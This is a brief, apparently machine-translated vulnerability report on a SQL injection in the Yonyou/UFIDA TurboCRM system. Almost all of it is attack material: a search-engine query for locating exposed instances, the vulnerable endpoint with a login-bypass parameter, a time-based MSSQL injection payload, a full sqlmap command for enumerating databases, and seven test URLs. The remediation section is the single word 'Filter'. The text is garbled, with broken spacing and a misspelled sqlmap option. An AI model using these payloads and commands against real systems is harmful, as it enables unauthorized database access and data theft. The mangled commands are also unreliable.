UFIDA TruboCRM management system SQL Injection Vulnerability
Yonyou TruboCRM management system SQL Injection
Yonyou CRM Customer Relationship Management system Google Keyword: intitle: yonyou TurboCRM intext: Login
Injection link:/background/updateactivityemailnum. php? DontCheckLogin = 1 & ID = 1
Injection parameter: ID
Payload :? ID = 1; waitfor delay '0: 0: 5 '--
Sqlmap injection command: sqlmap-u 'HTTP: // xxxxxx/background/updateactivityemailnum. php? ID = 1' -- level 5 -- risk 3 -- thechnique = T -- dbms mssql -- dbs -- random-agent -- batch-v 3
Test Case:
1. **. **/background/updateactivityemailnum. php? DontCheckLogin = 1 & ID = 1; waitfor delay '0: 0: 5 '--
2. http: // **. **: 8001/background/updateactivityemailnum. php? DontCheckLogin = 1 & ID = 1; waitfor delay '0: 0: 5 '--
3. http: // **. **: 8088/background/updateactivityemailnum. php? DontCheckLogin = 1 & ID = 1; waitfor delay '0: 0: 5 '--
4. http: // **. **/background/updateactivityemailnum. php? DontCheckLogin = 1 & ID = 1; waitfor delay '0: 0: 5 '--
5. http: // **. **: 8088/background/updateactivityemailnum. php? DontCheckLogin = 1 & ID = 1; waitfor delay '0: 0: 5 '--
6. **. **/background/updateactivityemailnum. php? DontCheckLogin = 1 & ID = 1; waitfor delay '0: 0: 5 '--
7. **. **: 2046/background/updateactivityemailnum. php? DontCheckLogin = 1 & ID = 1; waitfor delay '0: 0: 5 '--
Solution:
Filter